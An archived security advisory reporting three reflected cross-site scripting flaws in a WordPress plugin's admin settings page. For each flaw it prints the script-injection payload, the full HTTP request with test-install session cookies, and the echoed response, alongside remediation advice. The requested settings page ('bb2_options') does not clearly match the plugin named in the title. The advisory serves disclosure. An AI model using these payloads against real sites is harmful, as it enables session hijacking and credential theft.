WordPress Custom Contact Forms Cross Site Scripting

2012-05-11T00:00:00
ID PACKETSTORM:112616
Type packetstorm
Reporter SiNA Rabbani
Modified 2012-05-11T00:00:00

Description

                                        
                                            `-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Wordpress Security audit  
Custom Contact Forms  
  
1. Cross-site scripting (reflected)  
  
1.1. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
1.2. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
1.3. http://127.0.0.1/wp-admin/options-general.php [x parameter]  
  
  
Issue background  
Reflected cross-site scripting vulnerabilities arise when data is  
copied from a request and echoed into the application's immediate  
response in an unsafe way. An attacker can use the vulnerability to  
construct a request which, if issued by another application user, will  
cause JavaScript code supplied by the attacker to execute within the  
user's browser in the context of that user's session with the application.  
  
The attacker-supplied code can perform a wide variety of actions, such  
as stealing the victim's session token or login credentials,  
performing arbitrary actions on the victim's behalf, and logging their  
keystrokes.  
  
Users can be induced to issue the attacker's crafted request in  
various ways. For example, the attacker can send a victim a link  
containing a malicious URL in an email or instant message. They can  
submit the link to popular web sites that allow content authoring, for  
example in blog comments. And they can create an innocuous looking web  
site which causes anyone viewing it to make arbitrary cross-domain  
requests to the vulnerable application (using either the GET or the  
POST method).  
  
The security impact of cross-site scripting vulnerabilities is  
dependent upon the nature of the vulnerable application, the kinds of  
data and functionality which it contains, and the other applications  
which belong to the same domain and organisation. If the application  
is used only to display non-sensitive public content, with no  
authentication or access control functionality, then a cross-site  
scripting flaw may be considered low risk. However, if the same  
application resides on a domain which can access cookies for other  
more security-critical applications, then the vulnerability could be  
used to attack those other applications, and so may be considered high  
risk. Similarly, if the organisation which owns the application is a  
likely target for phishing attacks, then the vulnerability could be  
leveraged to lend credibility to such attacks, by injecting Trojan  
functionality into the vulnerable application, and exploiting users'  
trust in the organisation in order to capture credentials for other  
applications which it owns. In many kinds of application, such as  
those providing online banking functionality, cross-site scripting  
should always be considered high risk.  
Issue remediation  
In most situations where user-controllable data is copied into  
application responses, cross-site scripting attacks can be prevented  
using two layers of defences:  
  
Input should be validated as strictly as possible on arrival, given  
the kind of content which it is expected to contain. For example,  
personal names should consist of alphabetical and a small range of  
typographical characters, and be relatively short; a year of birth  
should consist of exactly four numerals; email addresses should match  
a well-defined regular expression. Input which fails the validation  
should be rejected, not sanitised.  
User input should be HTML-encoded at any point where it is copied into  
application responses. All HTML metacharacters, including < > " ' and  
=, should be replaced with the corresponding HTML entities (< >  
etc).  
  
In cases where the application's functionality allows users to author  
content using a restricted subset of HTML tags and attributes (for  
example, blog comments which allow limited formatting and linking), it  
is necessary to parse the supplied HTML to validate that it does not  
use any dangerous syntax; this is a non-trivial task.  
  
  
  
1.1. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
  
Summary  
  
Severity: High  
Confidence: Certain  
Host: http://127.0.0.1  
Path: /wp-admin/options-general.php  
  
Issue detail  
  
The name of an arbitrarily supplied request parameter is copied into  
the value of an HTML tag attribute which is encapsulated in double  
quotation marks. The payload  
c0cbb"><script>alert(1)</script>ce5abb2ef55 was submitted in the name  
of an arbitrarily supplied request parameter. This input was echoed as  
c0cbb\"><script>alert(1)</script>ce5abb2ef55 in the application's  
response.  
  
This proof-of-concept attack demonstrates that it is possible to  
inject arbitrary JavaScript into the application's response.  
  
Request  
GET  
/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIP/c0cbb"><script>alert(1)</script>ce5abb2ef55T%3E  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)  
Gecko/20100101 Firefox/11.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie:  
wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C0bc36ed70eff4d014b8f8f399e7931d9;  
bb2_screener_=1334008049+127.0.0.1;  
PHPSESSID=r0pobhl4p21uu57ek6lpdabr76;  
wordpress_test_cookie=WP+Cookie+check;  
wp-settings-1=widgets_access%3Doff%26uploader%3D127;  
wp-settings-time-1=1334005698;  
wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C68a0d9df0911bd2b367c681b0981811a  
  
Response  
HTTP/1.1 200 OK  
Date: Mon, 09 Apr 2012 21:56:22 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.6  
Set-Cookie: bb2_screener_=1334008582+127.0.0.1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Last-Modified: Mon, 09 Apr 2012 21:56:22 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Content-Length: 27835  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
<!--[if IE 8]>  
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" dir="ltr"  
lang="en-US">  
<![endif]-->  
<!--[if !(IE 8) ]><!-->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr  
...[SNIP]...  
<form method="post"  
action="/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIP/c0cbb\"><script>alert(1)</script>ce5abb2ef55T%3E">  
...[SNIP]...  
  
  
1.2. http://127.0.0.1/wp-admin/options-general.php [name of an  
arbitrarily supplied request parameter]  
  
Summary  
Severity: High  
Confidence: Certain  
Host: http://127.0.0.1  
Path: /wp-admin/options-general.php  
  
Issue detail  
The name of an arbitrarily supplied request parameter is copied into  
the value of an HTML tag attribute which is encapsulated in double  
quotation marks. The payload  
dafab"><script>alert(1)</script>70272c82dd9 was submitted in the name  
of an arbitrarily supplied request parameter. This input was echoed as  
dafab\"><script>alert(1)</script>70272c82dd9 in the application's  
response.  
  
This proof-of-concept attack demonstrates that it is possible to  
inject arbitrary JavaScript into the application's response.  
Request  
GET  
/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E&dafab"><script>alert(1)</script>70272c82dd9=1  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)  
Gecko/20100101 Firefox/11.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie:  
wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C0bc36ed70eff4d014b8f8f399e7931d9;  
bb2_screener_=1334008049+127.0.0.1;  
PHPSESSID=r0pobhl4p21uu57ek6lpdabr76;  
wordpress_test_cookie=WP+Cookie+check;  
wp-settings-1=widgets_access%3Doff%26uploader%3D127;  
wp-settings-time-1=1334005698;  
wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C68a0d9df0911bd2b367c681b0981811a  
  
Response  
HTTP/1.1 200 OK  
Date: Mon, 09 Apr 2012 21:55:48 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.6  
Set-Cookie: bb2_screener_=1334008548+127.0.0.1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Last-Modified: Mon, 09 Apr 2012 21:55:48 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Content-Length: 27815  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
<!--[if IE 8]>  
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" dir="ltr"  
lang="en-US">  
<![endif]-->  
<!--[if !(IE 8) ]><!-->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr  
...[SNIP]...  
<form method="post"  
action="/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3E&dafab\"><script>alert(1)</script>70272c82dd9=1">  
...[SNIP]...  
  
  
1.3. http://127.0.0.1/wp-admin/options-general.php [x parameter]  
  
Summary  
Severity: High  
Confidence: Certain  
Host: http://127.0.0.1  
Path: /wp-admin/options-general.php  
  
Issue detail  
The value of the x request parameter is copied into the value of an  
HTML tag attribute which is encapsulated in double quotation marks.  
The payload cf999"><script>alert(1)</script>cf9a9137481 was submitted  
in the x parameter. This input was echoed as  
cf999\"><script>alert(1)</script>cf9a9137481 in the application's  
response.  
  
This proof-of-concept attack demonstrates that it is possible to  
inject arbitrary JavaScript into the application's response.  
Request  
GET  
/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3Ecf999"><script>alert(1)</script>cf9a9137481  
HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:11.0)  
Gecko/20100101 Firefox/11.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip, deflate  
Proxy-Connection: keep-alive  
Cookie:  
wordpress_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C0bc36ed70eff4d014b8f8f399e7931d9;  
bb2_screener_=1334008049+127.0.0.1;  
PHPSESSID=r0pobhl4p21uu57ek6lpdabr76;  
wordpress_test_cookie=WP+Cookie+check;  
wp-settings-1=widgets_access%3Doff%26uploader%3D127;  
wp-settings-time-1=1334005698;  
wordpress_logged_in_5c016e8f0f95f039102cbe8366c5c7f3=admin%7C1334178029%7C68a0d9df0911bd2b367c681b0981811a  
  
Response  
HTTP/1.1 200 OK  
Date: Mon, 09 Apr 2012 21:50:48 GMT  
Server: Apache/2.2.20 (Ubuntu)  
X-Powered-By: PHP/5.3.6-13ubuntu3.6  
Set-Cookie: bb2_screener_=1334008248+127.0.0.1; path=/  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Last-Modified: Mon, 09 Apr 2012 21:50:48 GMT  
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,  
pre-check=0  
Pragma: no-cache  
X-Frame-Options: SAMEORIGIN  
Vary: Accept-Encoding  
Content-Length: 27848  
Content-Type: text/html; charset=UTF-8  
  
<!DOCTYPE html>  
<!--[if IE 8]>  
<html xmlns="http://www.w3.org/1999/xhtml" class="ie8" dir="ltr"  
lang="en-US">  
<![endif]-->  
<!--[if !(IE 8) ]><!-->  
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr  
...[SNIP]...  
<form method="post"  
action="/wp-admin/options-general.php?page=bb2_options&x=%3C%3CSCRIPT%3Ealert(%22XSS%22);//%3C%3C/SCRIPT%3Ecf999\"><script>alert(1)</script>cf9a9137481">  
...[SNIP]...  
  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.11 (GNU/Linux)  
  
iQIcBAEBAgAGBQJPrDhlAAoJEJPBwXYLR9VthYMP/jhPBJfnZORW2aOhd+NyHN3c  
+w07C1ORfs2dd0jqmv/YxodtCz9iaxYGrUNdnMtWi4aXf5dmByyGMl26QBu1+B5S  
2fuJpbXhR8ieFrk1bdXsLGgA6UDhoiBGjmHjH2bW8IrunKxJdEWrwwpsD9kP2uxU  
5N4ARvPLPGFdRGaeudrRB0ZGLgyGnvpOXUP4pUPtF/pduvM3fw8HgppI0aHLgLZl  
yJ6tO+fCE7Shzg7By0BgxpIWOZwtL0blgnn4Wu+zf/exfuQDg0PlIKG+PsmwR8uQ  
t5ftN2AHhNQOmXA9Puz/S4u3oF4xfYdN0qFRLUWggynvn9d7vUttD94n96nqREed  
+DwZzgnIN4DlYD03zywrm8Vq6e/h9n2jjZ/JBdju00FSy/XBAZpL7wLEohvHcN2q  
eiga2A8wdLpOT2lWpBWO0U4gmY8E3y3aIvZzRRWiKxDQjO/k6H9otnNeFtqoR92Z  
NnfYd9BQ2RG6pLQZxjM+BLLZcSiwk6bU5DCefd2HXOQeALhWKQQGZLC2oCwBgqHa  
BMs8iSpBR5qnukzMfdt0KmtwvDn92QJ7z8oaeJpsbSdDa2i5LaAO671odJEVnieQ  
irfLv69S5rubENsv43kj/VMNCBcTQKno4fB4r0YIOffiGCXOFtrCtJjqtsBwMxF3  
yF0NRLi0Sj7nyNHGkn2Y  
=kdl7  
-----END PGP SIGNATURE-----  
`